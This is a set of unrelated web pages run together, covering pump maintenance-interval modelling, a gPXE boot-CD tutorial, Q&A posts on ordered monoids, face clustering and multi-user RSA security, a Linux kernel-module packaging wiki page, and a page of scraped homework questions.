When we created our model, we made several simplifying assumptions. Among them were that the pumps would fail with a probability described by a log-normal distribution. This may or may not be correct; the actual failure mechanisms that contribute to the failures might generate a different distribution. We did not account for the entire observed failure behavior of real components: which exhibit many failures at an early age - which we ignored assuming the pumps and parts we used were “burned-in”; they also exhibit a small but non-zero failure rate during the majority of their lifetime. We did account for the “end-of-life” failures that are typically observed, but used a log-normal distribution. This is likely to be acceptable, but more detailed analysis is warranted.
Prior to instituting the scheduled maintenance, we would expect to see many failures at a steady rate over time. This would be expected to be near $$\frac{n_{\mathrm{total}}}{\mathrm{MTTF}}$$, or 206 failures per month. This would mean that the 50 sample window we assumed for estimating the parameters would span a time of about 1 week.
After adopting the scheduled maintance, we would expect to observe a much smaller number of failures since we are deliberately attempting to perform maintenance prior to failures in most cases. The number of failures that we would expect to see when using scheduled maintenance is $$\frac{n_{\mathrm{total}}}{\mathrm{MTTF}} \, \times \, F(t_{\mathrm{interval}})$$ or 13.5 failures per month. This is a much smaller observation rate and a 50 sample window will span a time of 16 weeks. This means that any updates to the maintenance interval will be much slower to adapt to any changes in the actual failure rates if they occur.
From the estimator performance we can see that it is possible to diverge quite far from the actual model parameters for short times. It would be prudent to implement a limit to changes in the maintenance interval in an attempt to smooth any excursions due to estimation error.
From the total cost curve plot, we can see that the area where the optimal maintenance interval occurs is a shallow minimum. This is encouraging since it means that any error in the implemented interval from the actual optimal interval will be close in cost to the desired minimum cost. This means that even if we selected a probability density function that was not accurate, it is likely that a more accurate density function would result in a similar interval selection.
## References
For additional Information see the following:
Software Engineering Tech Trends (SETT) is a regular publication featuring emerging trends in software engineering.
|
2022-08-07 23:09:27
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9640861749649048, "perplexity": 1385.6743246330182}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570730.59/warc/CC-MAIN-20220807211157-20220808001157-00235.warc.gz"}
|
http://linuxczar.net/blog/2012/01/05/dumb-tricks-with-gpxe/
|
For my first bit of magic with gPXE I decided to replace the boot ISOs I have for folks that are unable to install machines via PXE. With gPXE I don’t need my RHEL initrd and kernel image to boot strap myself into an install from a CD or USB stick. I’ve encoded the TFTP server and the file name to grab and execute into the gPXE image so as long as the machine can get any type of DHCP lease it will load up my PXELINUX environment. This makes the boot CD images work identically to doing a real PXE boot…because you are.
Step 1: I grabbed the gPXE distribution and unpacked it. I patched its autoboot functionality as described here. This lets me DHCP automatically even if the first ethernet device is not the one connected to the network. For gPXE 1.0.1 you can use my patch instead.
Step 2: Make an embedded script file. This just supplies the information to gPXE that a normal PXE boot would get from the next-server and filename options in the DHCP response.
#!gpxe
autoboot
chain tftp://FQDN/pxelinux.0
Yup, we have DNS support so just add the FQDN of your TFTP server. In my setup I have pxelinux.0 in the root of my TFTP server.
Step 3: Build gPXE with your embedded script.
make EMBEDDED_IMAGE=path/to/your/script
Step 4: Burn the resulting ISO onto a CD and PXE boot a PXE-less machine.
|
2017-06-24 23:58:11
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4837920665740967, "perplexity": 9420.36118048112}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128320368.57/warc/CC-MAIN-20170624235551-20170625015551-00540.warc.gz"}
|
https://math.stackexchange.com/questions/636971/recovering-ordered-monoid-operation-from-the-order
|
Recovering Ordered Monoid Operation from the Order
I have a partially ordered set $(X, \preceq)$ with the following properties:
• $X$ has a minimum. I'll name it $1$.
• For every $x \in X$, the principal filter ${\uparrow} x$ is order isomorphic to $X$.
I am wondering if it is possible to give $X$ the structure of an ordered monoid with $1$ as the identity. It seems like the map $\varphi_x: X \xrightarrow\cong {\uparrow} x \subseteq X$ could be thought of as an action of $x$ on $X$, but I am not sure how to justify that $\varphi_x \circ \varphi_y$ is of the form $\varphi_z$. Each $\varphi_x$ may not even be unique(?) Is it possible to choose $\varphi_x$'s in a consistent way?
Does it help if $X$ is an upward directed set, a join semilattice or a lattice? Would it be helpful if $X$ is well-founded?
Origin of the Problem:
I'll describe how this question comes up. I start with an ordered monoid $X$ whose identity $1$ is the minimum. The monoid operation and the order $\preceq$ satisfy:
$$x \preceq y \text{ if and only if there exists a unique } z \text{ with } zx = y. \tag{1}$$
If $x \preceq y$, we can write $\frac{y}{x}$ to refer to the unique element $z$ satisfying $zx = y$. Because $1$ is the minimum, $X$ is right cancellative: for $xz = yz$, $z \preceq yz$, and so $x = \frac{yz}z = y$. $X$ is not necessarily left cancellative, but $\frac{xy}x$ always exists because $1 \preceq y$, and so $x \preceq xy$. One potential problem is I don't know that $\frac{xy}x = y$. (My fraction notation here is not symmetric. The denominator is actually to the "right" of the numerator. This asymmetry is due to $(1)$ being asymmetric.) However, that is not the most important part of the question. It might be related though.
The main question is: Can we recover the monoid operation from $\preceq$? Of course $\preceq$ must come from the monoid operation, so it will have many properties that may be useful. The question formulated at the beginning is based only on some properties of $\preceq$. My guess is that there are other potentially useful properties that I have not found.
Also, if there are interesting special cases that would make the answer positive, I would be happy to hear about them. Well-foundedness might seem natural, but it is rather strong, and does not apply to $\mathbb R_{\ge 0}$.
• When you talk about an ordered monoid $(M, \leqslant)$, you assume that $x \leqslant y$ implies $zx \leqslant zy$ and $xz \leqslant yz$, right? – J.-E. Pin Jan 29 '14 at 18:43
• @J.-E.Pin Yes, that is what I meant. It seems to me that the answer to this question is negative although I haven't been able to come up with a counterexample. – Tunococ Feb 10 '14 at 2:40
|
2019-09-21 21:14:54
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9157167673110962, "perplexity": 100.50514901291058}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514574665.79/warc/CC-MAIN-20190921211246-20190921233246-00145.warc.gz"}
|
https://dsp.stackexchange.com/questions/38626/image-preprocessing-for-facial-detection-embedding-clustering-pipeline
|
# Image preprocessing for facial detection->embedding->clustering pipeline
I am trying to implement an end to end pipeline for facial clustering so that it can group people with the same faces. This will be quote a long post as I know that this is a very broad topic, so I have listed out what I have done step by step to show the pipeline that I currently have.
So far this is what I have done:
Detection
I used the dlib library to detect the bounding boxes for faces in the image which was created by Vahid Kazemi and Josephine Sullivan using an ensemble of regression trees to detect faces.
# Setup the models
face_detector = dlib.get_frontal_face_detector()
predictor_model = "shape_predictor_68_face_landmarks.dat"
face_pose_predictor = dlib.shape_predictor(predictor_model)
# Define the variables needed for the affine transform
w, h = 160, 160
eye_corner_dst = [[np.int(0.3 * w), np.int(h / 3)],\
[np.int(0.7 * w), np.int(h / 3)]]
# Get an image and find the faces
image = mpimg.imread(image_path)[:,:,0:3].astype(np.uint8) # RGBA -> RGB
detected_face = face_detector(image)
faces = []
Alignment: Part 1
After the boxes containing the faces are found I looped through all the detected boxes, and found the facial landmarks that are used to align the faces. The transform to align the faces is done in similiarty_transform, in this function two points are created in such a way that each point creates an equilateral triangle with each of the 2 input points eye_corner_src and eye_corner_dst. Afterwards, an affine transform can be estimated using cv2.estimateRigidTransform, the resulting transform is stored in the transform variable. Finally, I transform all detected landmarks using an affine transform determined by the transform matrix, which is stored in landmarks_t and created a Face object to store the relevant data which is appended to faces.
for face_rect in detected_face:
# First crop the face
left = max(0, face_rect.left())
top = max(0, face_rect.top())
right = min(image.shape[1], face_rect.right())
bottom = min(image.shape[0], face_rect.bottom())
new_face_rect = dlib.rectangle(0, 0, right-left, bottom-top)
cropped_image = copy.deepcopy(image)[top:bottom, left:right, :].astype(np.uint8)
# Get the the landmarks for the face
pose_landmarks = face_pose_predictor(cropped_image, new_face_rect)
# This function just returns an array of an array of points for the landmarks
landmarks = get_landmark_points(pose_landmarks, dlib_point=False)
# Get source points
left_eye = landmarks[36]
right_eye = landmarks[45]
eye_corner_src = [left_eye, right_eye]
# Compute similarity transform, returns
transform = similarity_transform(eye_corner_src, eye_corner_dst)
# Apply similarity transform on image
cropped_image_t = cv2.warpAffine(cropped_image, transform, (w, h))
# Apply similarity transform points
# Note here rs stands for reshape, t for transformed
landmarks_rs = np.reshape(np.array(landmarks), (68, 1, 2))
landmarks_t = cv2.transform(landmarks_rs, transform)
# Append boundary points. Which will be used in Delaunay triangulation
landmarks_t = np.float32(np.reshape(landmarks_t, (68, 2)))
faces.append(Face(cropped_image_t, landmarks_t))
This is the result at the end of the first part of the alignment stage
Alignment: Part 2
Now that the landmarks are found, the goal now is to align the face using Delaunay Triangulation but to do this I need to have destination points for the landmark points. Therefore, I simply chose a front facing picture and found the landmark points for that picture.
Here is a result of that:
Alignment: Part 3
In this final part of the alignment, I use Delaunay Triangulation (created by the landmarks found in Part 1) to align the affine transformed face (found in Part 1) with the "ideal" face (found in Part 2) triangle by triangle. This is done so that all the facial features appear in the same place.
# Get the delaunayTriangles
dt = calculateDelaunayTriangles(rect, np.array(landmarks_dst))
# Get the transformed landmarks
landmarks_t = face.landmarks
# Get the transformed image of the face
face_image = face.face_image.copy()
# Output image
output = np.zeros((h, w, 3), np.float32())
# Transform the triangles one by one
for j in range(len(dt)):
triangleIn = []
triangleOut = []
# So here we are getting the jth triangle (remember this this
# is a 3-tuple with each tuple corresponding to an index which
# can be used to find a point in landmarks_t or dst_landmarks)
for k in range(3):
pointIn = landmarks_t[dt[j][k]]
pointIn = constrainPoint(pointIn, w, h)
pointOut = landmarks_dst[dt[j][k]] # replace this with the set landmark coordinates
pointOut = constrainPoint(pointOut, w, h)
triangleIn.append(pointIn)
triangleOut.append(pointOut)
# Now draw on the new image
warpTriangle(face_image, output, triangleIn, triangleOut)
This is the output image after all the triangles are warped:
This is the image that is used to create the facial features.
Feature Extraction
I used facenet to extract the facial features. All I did here was to load up the model and run my image through the network to receive the extracted feature which is a unit sphere in 128 dimensional space.
# Now utilize facenet to find the embeddings of the faces
MODEL_DIR = "20170216-091149"
# Get the save files for the models
meta_file, ckpt_file = facenet.get_model_filenames(MODEL_DIR)
with tf.Graph().as_default():
with tf.Session().as_default() as sess:
embedding_layer = facenet.custom_load_model(sess, MODEL_DIR, meta_file, ckpt_file)
# Find the embedding for the face
face_embedding = embedding_layer(output)
Clustering Before the clustering step I perform PCA (although my results show that it does not increase the accuracy by much) as clustering doesn't work that well in high dimensions.
Note here that I have assumed a variable face_embeddings which consists of multiple face_embedding.
pca = PCA(n_components = 10) # captures ~91% of variance
face_embeddings_reduced = pca.fit_transform(face_embeddings)
I then cluster with K-means:
clusterer = KMeans(n_clusters = 2, random_state = 10)
cluster_labels = clusterer.fit_predict(face_embeddings)
The result that I got was good, but not that good as I manually determined the number of clusters, and I only tested images from 2 different people.
Here are the results:
Cluster 0 has individuals: {'Abdullah_Gul': 6, 'Bill_Gates': 8}
Cluster 1 has individuals: {'Abdullah_Gul': 10, 'Bill_Gates': 9}
I am wondering where can my pipeline by improved, and what is the cause of this low accuracy. Is it during face alignment? Is the method that I'm using outdated? I have read about using two CNNs to create a pipeline. The first network being the MTCNN for creating the bounding boxes for faces, and the second network from here which has a Spatial Transformer module in the first layer to automatically align the faces. If someone could provide me with some resources to read or some pointers it would be great!
|
2020-08-09 23:32:40
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4270048439502716, "perplexity": 2807.7567575131234}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738595.30/warc/CC-MAIN-20200809222112-20200810012112-00551.warc.gz"}
|
https://wiki.linuxfoundation.org/driver-backport/kmp_macros
|
Linux Foundation Wiki
project collaboration site
Site Tools
driver-backport:kmp_macros
KMP Macros
Contents
Purpose This page will eventually provide an “API Reference” for the macros used to build KMPs with the standard spec file on https://www.linux-foundation.org/en/Sample_KMP_spec_file . Process
1. Work through the “Current Issues below.
2. Fill in the “KMP Macros - API Reference” section below.
Current Issues
1. Can we agree to just call the main macro %kernel_module_package?
2. %kernel_module_package macro needs to include an option to the macro that specifies the pciid that gets installed in a standard location when the KMP is installed.
3. We need an option that specifies the firmware file that gets installed in a standard location when the KMP is installed.
4. We need an option that specifies that the modules in the KMP get added to the initrd when installed.
5. Can we pull the explicit %package KMP stuff (in the SUSE spec file) into %suse_kernel_module_subpackage? Or can we just remove it from the spec file? (Removing it would eliminate the ability for SUSE subpackages to have a different summary and description from the main package.)
6. Can we invent %make_build and %make_install macros that take flavor as an argument? That will hide the details of the make command behind the macros.
7. Can we invent an %install_mod macro to handle INSTALL_MOD_PATH and INSTALL_MOD_DIR?
Proposed Standard KMP Macros
kernel_module_package_buildreqs
Should evaluate to: Everything needed for “BuildRequires”.
SUSE needs to change kernel_module_package_buildreq to kernel_module_package_buildreqs and update “build” so that it can handle this macro. kernel_source() - Already Works on SUSE and Red Hat Should evaluate to: Directory containing top-level kernel Makefile (used in “make -C %{kernel_source \$flavor} modules M=\$PWD/obj/\$flavor”) _kermoddir Should evaluate to: Directory for installed modules. I.e., SUSE would evaluate to “updates”, Red Hat would evaluate to “updates/%name”.
Suggested macro for SUSE to add to /usr/lib/rpm/macros:
` %_kermoddir(n:) %{expand:%(echo "updates")}`
Suggested macro for Red Hat to add to /usr/lib/rpm/redhat/macros:
``` %_kermoddir(n:) %{expand:%( \
|
2018-06-25 07:58:29
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8492962121963501, "perplexity": 6805.680816791253}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267867579.80/warc/CC-MAIN-20180625072642-20180625092642-00506.warc.gz"}
|
https://solvedlib.com/n/10-0-6-points-detailsprevious-answerszillengmath6-9-5-015,7686786
|
# 10. [0/6 Points]DETAILSPREVIOUS ANSWERSZILLENGMATH6 9.5.015.Find the directional derivative of the given function at the given point in the indicated direction.
###### Question:
10. [0/6 Points] DETAILS PREVIOUS ANSWERS ZILLENGMATH6 9.5.015. Find the directional derivative of the given function at the given point in the indicated direction. f(x, Y) = (xy + 1)2; (7, 6), in the direction of (9, 7) Duf(7, 6) eBook
#### Similar Solved Questions
##### PLEASE SHOW (STEP-BY-STEP) HOW YOU WOULD SOLVE TO FIND THE ANSWER. REPLACEMENT ANALYSIS The Oviedo Company...
PLEASE SHOW (STEP-BY-STEP) HOW YOU WOULD SOLVE TO FIND THE ANSWER. REPLACEMENT ANALYSIS The Oviedo Company is considering the purchase of a new machine to replace an obsolete one. The machine being used for the operation has a book value and a market value of zero. However, the machine is in good w...
##### You fire a rifle at a target that is 200 m down range from a platform that is 10 m above the ground: If the bullet leaves the gun horizontally with an initial speed of 250 m/s, what is the final speed in the X- and V-directions as well as the resultant final velocity of the bullet? 5. An object is launched from the ground so that it has an initial velocity of 20 m/s at an angle of 309 from the horizontal ground, how high will it travel up? An object is launched from the ground so that it has an
You fire a rifle at a target that is 200 m down range from a platform that is 10 m above the ground: If the bullet leaves the gun horizontally with an initial speed of 250 m/s, what is the final speed in the X- and V-directions as well as the resultant final velocity of the bullet? 5. An object is l...
##### For the following C program: Let’s add one more user defined method to the program. This...
For the following C program: Let’s add one more user defined method to the program. This method, called ReverseDump is to output the values in the array in revere order (please note that you are NOT to use the Array.Reverse method from the Array class). The approach is quite simple: your Rev...
##### Who are the Big Four or Global Seven accounting and business advisory firms? Please select any...
Who are the Big Four or Global Seven accounting and business advisory firms? Please select any accounting firm, large or small, via the internet and just do several minutes of research on them and share your findings with the rest of us. Have some fun, and good luck!...
##### Question 3. [10 marks] Let A and B be two n X n matrices If both are non: ~invertible, can AB ever be invertible? Prove your assertion:Let A e Maxn(R) be such that A? = A What can you say about det A?
Question 3. [10 marks] Let A and B be two n X n matrices If both are non: ~invertible, can AB ever be invertible? Prove your assertion: Let A e Maxn(R) be such that A? = A What can you say about det A?...
##### Char An atom mass a nuclear Question IL having 18 charge 0f +1 18 of 19 1 19 1 and 20 electrons has
char An atom mass a nuclear Question IL having 18 charge 0f +1 18 of 19 1 19 1 and 20 electrons has...
##### How to convert between measurement units?
How to convert between measurement units?...
##### A manufacturer is designing a two-wheeled cart that can maneuver in tight spaces. On one test...
A manufacturer is designing a two-wheeled cart that can maneuver in tight spaces. On one test model, the wheel placement (center) and radius are modeled by the equation (x - 1)2 + (y + 2)2 = 4. Which graph shows the position and radius of the wheels? 3 由 当 -- 个 4 X -8 8 X...
##### Congider the reaction2H,O(g) - ~Ch(g} AncIe) - 0x(g)fr whick AH' = 114,4PJ and 4S: = 128,9 JK at 293.1K(1) Calculate the entropy change ofthe UNI ERSE when J0:9 mnole: ofH,O(g) react under standard conditiona & 298 ]SK ASuer:e WTK(2) Is this reaction reactant Cr product favored under standard con ditions(3) If the reaction 15 product f cred_ Tentbalpy fzvcred_ entropy farored, Or farrored 6;" both enthalpy and entropy? Ifthe reaction reactznt fzrcred choose 'reactant frored&x
Congider the reaction 2H,O(g) - ~Ch(g} AncIe) - 0x(g) fr whick AH' = 114,4PJ and 4S: = 128,9 JK at 293.1K (1) Calculate the entropy change ofthe UNI ERSE when J0:9 mnole: ofH,O(g) react under standard conditiona & 298 ]SK ASuer:e WTK (2) Is this reaction reactant Cr product favored under st...
##### Use the three-letter shorthand notations to name the two isomeric dipeptides that can be made from valine and cysteine. Draw both structures.
Use the three-letter shorthand notations to name the two isomeric dipeptides that can be made from valine and cysteine. Draw both structures....
##### Consider the functionf(z) =€COS %.Compute the 4th degree Taylor polynomial P(z) about the point € = T_ Find an upper bound on the error associated with P (z) On the interval T < € < T+0.5. Let In be an approximation to the integralT+0.5 f(z)dz,where f (z) is approximated by Pa(z). Find I: Using the upper bound obtained in (b), find an upper bound on the error associated with the approximation [4 in part (c) Using MATLAB, compute values of the approximation I, in part (c) for increasi
Consider the function f(z) =€COS %. Compute the 4th degree Taylor polynomial P(z) about the point € = T_ Find an upper bound on the error associated with P (z) On the interval T < € < T+0.5. Let In be an approximation to the integral T+0.5 f(z)dz, where f (z) is approximated ...
##### In a Si-Br bond, the 6+ should be placed on bondASi-P bond would be classified as a ha atom, respectively:nonpolar covalent, bromingnotpolar cova enl, silconpolar covulanl aiconpovar COYalen , tromine
In a Si-Br bond, the 6+ should be placed on bond ASi-P bond would be classified as a ha atom, respectively: nonpolar covalent, broming notpolar cova enl, silcon polar covulanl aicon povar COYalen , tromine...
##### Consider thle reaction:2HBr(g) ~Hx(g) Br_()Using standard thermodynamic data at 29SK calculate the free energy change when 2.33 moles of HBr(g) react at standard conditions AG mn
Consider thle reaction: 2HBr(g) ~Hx(g) Br_() Using standard thermodynamic data at 29SK calculate the free energy change when 2.33 moles of HBr(g) react at standard conditions AG mn...
##### Each respondent in the Current Population Survey of March 2005 was classi- fied es employed, unemployed or outside the labor force. The results for men in Califomia age 35 4cen becross-labulated by marital status, as follows:"5 Widowed divorced Never Married separated married Employed 790 98 209 Unemployed 56 27 Not in labor force 21 13Men of different marital status seem t0 have different distributions of labor force status. Or is this just chance variation? (You may assume the data come f
Each respondent in the Current Population Survey of March 2005 was classi- fied es employed, unemployed or outside the labor force. The results for men in Califomia age 35 4cen becross-labulated by marital status, as follows:"5 Widowed divorced Never Married separated married Employed 790 98 20...
##### Tip Top Painting Company has the following production data for March: Beginning work in process, 2,000...
Tip Top Painting Company has the following production data for March: Beginning work in process, 2,000 units, which are 30% complete for conversion costs Units transferred out, 44,000 Units in ending work in process, 9,000, which are 80% complete for conversion costs Materials are added only at the ...
##### Complete a multithreaded application that solves a problem of your choice, e.g., Sudoku solution validator (Chapter...
Complete a multithreaded application that solves a problem of your choice, e.g., Sudoku solution validator (Chapter 4, Project 1), multithreaded sorting application (Chapter 4, Project 2), matrix multiplication, factorial solver, etc. While I recommend using C, you may use Java or any other language...
##### Forwhat valueof [ , 1f any, 1S the vector (Zt,-1Jparaltel tothevector (4, -1? 04 [= 8 08 [342 @C. [=8 Sd Mpt [- 02 16
Forwhat valueof [ , 1f any, 1S the vector (Zt,-1Jparaltel tothevector (4, -1? 04 [= 8 08 [342 @C. [=8 Sd Mpt [- 02 16...
##### What are the products of the following reaction? CHIkatcH,oH IVOcHlOHCholOHOHcHOCH,onMoving to the next question prevents changes to this answer.MacBoolfPro
What are the products of the following reaction? CH Ikat cH,oH IV OcHl OH Chol OH OH cH OCH,on Moving to the next question prevents changes to this answer. MacBoolfPro...
##### Quiz 5 Question 14 of 14 (1 point) F 2 1 1 3 4 6...
Quiz 5 Question 14 of 14 (1 point) F 2 1 1 3 4 6 F5 8 Name these organic compounds: structure name Cl CI Cl Br...
##### Question 5(8)Find the interval in which f(x) = x"is increasing or decreasing: (4)Final/363 / BTC/Znd Sem. 2019-20Page 5Find the equation of the normal to the curveatthe point (2, 8)- X+] (4)
Question 5 (8) Find the interval in which f(x) = x" is increasing or decreasing: (4) Final/363 / BTC/Znd Sem. 2019-20 Page 5 Find the equation of the normal to the curve atthe point (2, 8)- X+] (4)...
##### Students were asked to prepare nickel sulfate by reacting a nickel compound with a sulfate compound in water and then evaporating the water. Three students chose these pairs of reactants:Comment on each student's choice of reactants and how successful you think each student will be at preparing nickel sulfate by the procedure indicated.
Students were asked to prepare nickel sulfate by reacting a nickel compound with a sulfate compound in water and then evaporating the water. Three students chose these pairs of reactants:Comment on each student's choice of reactants and how successful you think each student will be at preparing...
##### Ind all real solution s ot Jay-Jey沂 2
ind all real solution s ot Jay-Jey沂 2...
##### Use polar coordinates to find the limit; (Kint: Let *cos(0)csin(0), and notc that (xY) - (O, 0) imples r _ 04]Mto, 0)
Use polar coordinates to find the limit; (Kint: Let * cos(0) csin(0), and notc that (xY) - (O, 0) imples r _ 04] Mto, 0)...
##### Using the results r(128) = .34, p > .05, what is sr? A. .18 B. .08...
Using the results r(128) = .34, p > .05, what is sr? A. .18 B. .08 C. .09 D. .01...
##### Math 301 Homework Assignment 7 Recall that @ is the set of rational numbers. Define a relation over where only if b = d,where and are in lowest terms Show that is an equivalence relation] Describe the equivalence classes underif and
Math 301 Homework Assignment #7 Recall that @ is the set of rational numbers. Define a relation over where only if b = d,where and are in lowest terms Show that is an equivalence relation] Describe the equivalence classes under if and...
##### Q6. A 50 Hz, 25 kVA 7200/240 V transformer has the following equivalent circuit parameters: Prima...
Please show full working Q6. A 50 Hz, 25 kVA 7200/240 V transformer has the following equivalent circuit parameters: Primary resistance-1562, secondary resistance-0.02 Ω Primary leakage reactance-140Q, Secondary leakage reactance-0.15Q, Magnetising reactance 30 k2, Core loss resistance 200 k2...
##### Sample ol 33 observatons selecled Irom norma population: The sample mejn is Conduct the following test of hypothesis using the 0.05 signilicance level:and the population standard deviationHo: H = 38 H Vt 38Is thlstwo-tailed test?[Ciickto selecl)Whai the decision rule?Reject Ho and accept H1 when does not Iile Ine region ItomWhat the value Oltho e51 statistic? (Negative answer should be Indicated by minus sign: Round the final answer to decImal places-)Value of the test statisticWhat your decisio
sample ol 33 observatons selecled Irom norma population: The sample mejn is Conduct the following test of hypothesis using the 0.05 signilicance level: and the population standard deviation Ho: H = 38 H Vt 38 Is thls two-tailed test? [Ciickto selecl) Whai the decision rule? Reject Ho and accept H1 w...
|
2023-03-25 20:04:12
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.531440019607544, "perplexity": 5294.266162826821}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945372.38/warc/CC-MAIN-20230325191930-20230325221930-00754.warc.gz"}
|
https://crypto.stackexchange.com/questions/81145/multi-users-rsa-problem
|
# Multi-users RSA problem
Rivest and Kalisky's RSA problem considers various notions on security of the RSA One-Way Trapdoor Permutation. They do it only from the perspective of a single user.
What's the state of the art in the multi-users RSA problem and its reduction to other problems?
Assume a public directory of $$u$$ public keys $$(N_i,e_i)$$ all with the same bit size $$|N_i|=k$$. Assume $$N_i=p_i\,q_i$$ with $$p_i,q_i\in[\,\lceil2^{(k-1)/2}\rceil,2^{k/2}\,)$$. Assume these primes chosen independently and uniformly at random among those with $$\gcd(p_i-1,e_i)=1=\gcd(q_i-1,e_i)$$ for some odd $$e_i\ge3$$, unless that matters.
Adversaries succeed if they pass this test:
1. Challenger draws and submits random $$y\in[0,2^{k-1})$$
2. Adversary chooses and submits $$i\in[0,u)$$
3. Adversary submits $$x$$ and succeeds if $$x^e\bmod N_i=y$$.
Make this the multi-users RSA (authentication¹) problem. Add two-pass when we exchange 1 and 2 (forcing the adversary to choose its target before the challenger supplies the challenge $$y$$), which can only make the attacker's task harder. Add low exponent when $$|e|$$ is upper-bounded by a constant value. Add fixed exponent when $$\forall i,\ e_i=e$$.
For concreteness, consider an access control system using Smart Cards to authenticate users, where each has internally drawn a public/private key pair. Assume keys per² FIPS 186-4 appendix B.3, which wants $$k\in\{1024,2048,3072\}$$ and $$|e|\in(16,256]$$. Assume $$e=65537$$ when $$e$$ is fixed. Noticeably, there are special conditions on the primes mandated specifically when $$k=1024$$, and part of the question is: are they useful³ for some practical parameter $$u$$?
